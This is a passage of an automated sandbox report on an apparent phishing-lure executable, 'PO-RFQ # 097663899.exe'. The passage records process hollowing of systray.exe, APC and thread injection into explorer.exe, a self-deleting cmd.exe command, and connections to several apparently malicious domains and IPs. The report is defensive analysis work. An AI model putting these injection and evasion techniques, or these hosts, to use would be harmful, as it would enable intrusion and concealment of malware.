          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]14_2_0510B8D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]14_2_0510B8D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]14_2_0510B8D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]14_2_0510B8D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050758EC mov eax, dword ptr fs:[00000030h]14_2_050758EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513131B mov eax, dword ptr fs:[00000030h]14_2_0513131B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507DB40 mov eax, dword ptr fs:[00000030h]14_2_0507DB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148B58 mov eax, dword ptr fs:[00000030h]14_2_05148B58
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507F358 mov eax, dword ptr fs:[00000030h]14_2_0507F358
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507DB60 mov ecx, dword ptr fs:[00000030h]14_2_0507DB60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A3B7A mov eax, dword ptr fs:[00000030h]14_2_050A3B7A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A3B7A mov eax, dword ptr fs:[00000030h]14_2_050A3B7A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05081B8F mov eax, dword ptr fs:[00000030h]14_2_05081B8F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05081B8F mov eax, dword ptr fs:[00000030h]14_2_05081B8F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512D380 mov ecx, dword ptr fs:[00000030h]14_2_0512D380
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513138A mov eax, dword ptr fs:[00000030h]14_2_0513138A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AB390 mov eax, dword ptr fs:[00000030h]14_2_050AB390
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2397 mov eax, dword ptr fs:[00000030h]14_2_050A2397
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]14_2_050A4BAD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]14_2_050A4BAD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4BAD mov eax, dword ptr fs:[00000030h]14_2_050A4BAD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05145BA5 mov eax, dword ptr fs:[00000030h]14_2_05145BA5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F53CA mov eax, dword ptr fs:[00000030h]14_2_050F53CA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F53CA mov eax, dword ptr fs:[00000030h]14_2_050F53CA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509DBE9 mov eax, dword ptr fs:[00000030h]14_2_0509DBE9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A03E2 mov eax, dword ptr fs:[00000030h]14_2_050A03E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05088A0A mov eax, dword ptr fs:[00000030h]14_2_05088A0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AA16 mov eax, dword ptr fs:[00000030h]14_2_0513AA16
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AA16 mov eax, dword ptr fs:[00000030h]14_2_0513AA16
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AA16 mov eax, dword ptr fs:[00000030h]14_2_0507AA16
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AA16 mov eax, dword ptr fs:[00000030h]14_2_0507AA16
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05093A1C mov eax, dword ptr fs:[00000030h]14_2_05093A1C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]14_2_05075210
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov ecx, dword ptr fs:[00000030h]14_2_05075210
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]14_2_05075210
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05075210 mov eax, dword ptr fs:[00000030h]14_2_05075210
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B4A2C mov eax, dword ptr fs:[00000030h]14_2_050B4A2C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B4A2C mov eax, dword ptr fs:[00000030h]14_2_050B4A2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.107.56.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kopebitest.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mayipay9.com
          Source: C:\Windows\explorer.exeDomain query: www.ahaal20.com
          Source: C:\Windows\explorer.exeDomain query: www.aquaroyaume.com
          Source: C:\Windows\explorer.exeDomain query: www.agarkovsport.online
          Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.farmacyfastfood.com
          Source: C:\Windows\explorer.exeDomain query: www.oldschoolnews.net
          Source: C:\Windows\explorer.exeNetwork Connect: 212.237.249.116 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.253.212.249 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.qingniang.club
          Source: C:\Windows\explorer.exeDomain query: www.salesenablementlaunch.com
          Source: C:\Windows\explorer.exeDomain query: www.globalperfumery.com
          Source: C:\Windows\explorer.exeDomain query: www.lattakia-imbiss.com
          Source: C:\Windows\explorer.exeDomain query: www.bigbuddyco.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeMemory written: C:\Users\user\Desktop\PO-RFQ # 097663899.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 10C0000Jump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeProcess created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.272654375.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000002.493868984.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Users\user\Desktop\PO-RFQ # 097663899.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
